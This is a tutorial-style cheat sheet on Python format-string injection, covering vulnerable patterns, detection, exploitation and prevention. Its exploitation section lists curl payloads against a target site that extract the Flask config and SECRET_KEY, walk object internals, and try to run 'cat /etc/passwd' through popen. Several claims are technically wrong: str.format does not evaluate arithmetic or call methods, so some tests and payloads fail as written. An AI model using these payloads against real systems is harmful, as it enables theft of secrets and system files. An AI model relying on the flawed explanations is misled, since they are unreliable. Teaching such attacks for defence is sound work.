Python Format String Injection

.format() method allows accessing object attributes and methods. When user input is used in format strings, attackers can access sensitive application internals

Vulnerable Code Patterns

Pattern 1: Direct User Input in Format

user_input = request.args.get('name')
message = "Hello {}".format(user_input)

Pattern 2: Format with Accessible Variables

template = request.args.get('template')
secret_key = "my-secret-key"
result = template.format(secret=secret_key)

Pattern 3: Logging with Format

log_message = user_input
logger.info(log_message.format(config=app.config))

Detection

Step 1: Identify Format String Usage

Look for these patterns in source code:

.format()
f"{variable}"
"{0}".format()
Template().substitute()

Step 2: Test for Execution

Test basic arithmetic

curl "https://target.com/greet?name={7*7}"

Step 3: Test Object Access

Try accessing object attributes

curl "https://target.com/greet?name={obj.__class__}"

• If returns <class 'str'> or similar, vulnerable

Testing Checklist

• Test with {7*7} - does it evaluate to 49?

• Test with {obj.__class__} - does it show class info?

• Test with {__builtins__} - does it reveal built-ins?

• Look for error messages revealing object types

• Check if special characters {}[](). are allowed

• Test in different input fields (forms, URLs, headers)

Exploitation Techniques

Information Disclosure - Flask

Access app configuration

curl "https://target.com/log?msg={app.config}"

Access specific config value

curl "https://target.com/log?msg={app.config[SECRET_KEY]}"

Access environment variables

curl "https://target.com/log?msg={request.environ}"

Object Tree Walking

{obj.__class__}           # Get class of object
{obj.__class__.__bases__} # Get parent classes
{obj.__globals__}         # Access global variables
{obj.__builtins__}        # Access built-in functions

Payload

curl --globoff "https://target.com/api?data={obj.__class__.__bases__[0].__subclasses__()}"

Reading Files

{obj.__class__.__bases__[0].__subclasses__()[40].__init__.__globals__[sys].modules[os].popen('cat /etc/passwd').read()}

• obj.__class__.__bases__[0].__subclasses__() - Get all subclasses

• [40] - Index to subprocess or similar (varies by Python version)

• __init__.__globals__ - Access global namespace

• [sys].modules[os] - Get OS module

• .popen('command') - Execute command

• .read() - Get output

Common Framework Targets

Flask:

{app}                    # Application object
{config}                 # Configuration
{request}                # Current request
{session}                # Session data
{g}                      # Global context

Django:

{settings}               # Django settings
{request.user}          # Current user
{request.META}          # Request metadata

Prevention

Method 1: Never Use User Input in Format

Vulnerable Code:

template = user_input
result = template.format(data=sensitive_data)

Use fixed templates

template = "Hello {name}"
result = template.format(name=sanitized_input)

Method 2: Use Safe Alternatives

Use string.Template instead

from string import Template

template = Template("Hello $name")
result = template.safe_substitute(name=user_input)

• Only substitutes valid identifiers, can't access attributes.

Method 3: Whitelist Allowed Values

Only allow specific keys

ALLOWED_KEYS = {'name', 'email', 'age'}

user_template = request.args.get('template')
# Validate template only uses allowed keys
if not all(key in ALLOWED_KEYS for key in extract_keys(user_template)):
    abort(400)

Method 4: Escape User Input

from markupsafe import escape

user_input = request.args.get('name')
safe_input = escape(user_input)
result = f"Hello {safe_input}"